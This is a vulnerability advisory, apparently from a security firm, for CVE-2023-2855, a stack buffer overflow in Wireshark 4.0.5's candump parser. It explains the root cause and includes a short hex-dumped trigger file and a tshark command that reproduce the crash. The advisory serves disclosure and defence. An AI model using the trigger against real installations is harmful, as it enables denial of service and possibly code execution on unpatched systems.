Stack-buffer-overflow in candump_write_packet

May 26, 2023

CVE Number

CVE-2023-2855

Credits

Huascar Tejeda of Pentraze Cybersecurity

Summary

A stack-buffer-overflow vulnerability has been identified in Wireshark 4.0.5’s candump_write_packet function. This issue occurs when processing a specially crafted payload, which results in a crash and potentially code execution.

CVSS

9.0 (Critical) - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

Details

The issue can be traced back to the candump_write_packet function in the wiretap/candump.c file. The ASAN report indicates a WRITE operation of size 9 at address 0x7fffffffdb88, which overflows the can_frame.sroa.660 variable in the stack.

The root cause of the vulnerability appears to be the use of the memcpy function in the candump_write_packet function at line 83. The memcpy function is called with a length value that is larger than the destination buffer, causing a buffer overflow:

#define CAN_MAX_DLEN   8

typedef struct can_frame {
    guint32 can_id;                       /* 32 bit CAN_ID + EFF/RTR/ERR flags */
    guint8  can_dlc;                      /* frame payload length in byte (0 .. CAN_MAX_DLEN) */
    guint8  __pad;                        /* padding */
    guint8  __res0;                       /* reserved / padding */
    guint8  __res1;                       /* reserved / padding */
    guint8  data[CAN_MAX_DLEN];
} can_frame_t;

memcpy(can_frame.data, msg->data.data, msg->data.length);


> b *candump_write_packet+612:

   $rdi = 0x00007fffffffdd78 → 0x0000000000000000,
   $rsi = 0x00007fffffffde12 → 0x0000000000000000,
 → $rdx = 0x0000000000000009   
 →   0x42ba84 <candump_write_packet+612> call   0x406f30 <memcpy@plt>

The can_frame structure is used to store CAN (Controller Area Network) frames, including the CAN ID, data length code (DLC), and the actual data. The issue here is that msg->data.length is 9, which is larger than the size of the destination buffer can_frame.data (8 bytes). This results in a buffer overflow when memcpy tries to copy 9 bytes from the source buffer to the destination buffer, which can only accommodate 8 bytes.

Steps to reproduce:

  1. Download and install Wireshark 4.0.5
  2. Run tshark -r trigger
$ xxd -g1 trigger
00000000: 28 30 2e 30 29 09 30 09 30 30 30 23 52 39        (0.0).0.000#R9

$ tshark -r trigger
*** buffer overflow detected ***: terminated
Aborted

# After recompiling with "CANDUMP_DEBUG"
$ tshark -r trigger
candump_parse: Trying candump file decoder
candump_parse: Starting parser at offset 0
run_candump_parser: Starting parsing
yy_reduce: read message
run_candump_parser: Done (0)
candump_parse: Success
candump_open: This is our file
candump_read: Try reading at offset 0
candump_parse: Trying candump file decoder
candump_parse: Starting parser at offset 0
run_candump_parser: Starting parsing
yy_reduce: read message
run_candump_parser: Done (0)
candump_parse: Success
candump_read: Stopped at offset 14
*** buffer overflow detected ***: terminated
Aborted

Servicios

Pruebas de Penetración

Evaluación proactiva utilizando tácticas, técnicas y procedimientos de atacantes reales para identificar fallas de seguridad, configuraciones incorrectas y vulnerabilidades.

Más información

Seguridad de Aplicaciones

Protección integral de aplicaciones, garantizando la seguridad en todas las fases del desarrollo.

Más información

Ejercicios de Red Team

Simulación avanzada de ataques cibernéticos para evaluar y mejorar la capacidad de respuesta de una organización.

Más información

Gestión de Vulnerabilidades

Proceso proactivo para identificar, priorizar y abordar las vulnerabilidades de seguridad en sistemas y software, mejorando la defensa de una organización contra las amenazas cibernéticas en evolución.

Más información